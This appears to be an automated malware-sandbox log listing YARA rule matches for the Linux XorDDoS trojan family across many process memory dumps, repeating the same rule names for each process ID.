Source: 6554.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6554.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6554.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6554.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6554.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6359.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6359.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6359.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6359.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6359.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6359.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6422.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6422.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6422.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6422.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6422.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6422.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6386.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6386.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6386.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6386.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6386.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6386.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6474.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6474.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6474.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6474.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6474.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6474.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6381.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6381.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6381.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6381.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6381.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6381.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6420.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6420.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6420.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6420.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6420.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6420.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6296.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6296.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6296.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6296.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6296.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6296.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6493.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6493.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6493.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6493.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6493.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6493.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6389.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6389.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6389.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6389.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6389.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6389.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6537.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6537.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6537.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6537.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6537.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6537.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6412.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6412.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6412.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6412.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6412.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6412.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6330.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6330.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6330.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6330.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6330.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6330.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6279.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6279.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6279.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6279.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6279.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6279.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6271.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6271.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6271.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6271.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6271.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6271.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6545.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6545.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6545.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6545.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6545.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6545.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6528.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6528.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6528.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6528.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6528.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6528.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6518.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6518.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6518.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6518.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6518.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6518.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6276.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6276.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6276.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6276.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6276.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6276.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6511.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6511.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6511.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6511.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6511.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6511.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6455.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6455.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6455.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6455.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6455.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6455.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6521.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6521.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6521.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6521.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6521.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6521.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6503.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6503.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6503.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6503.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6503.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6503.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6342.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
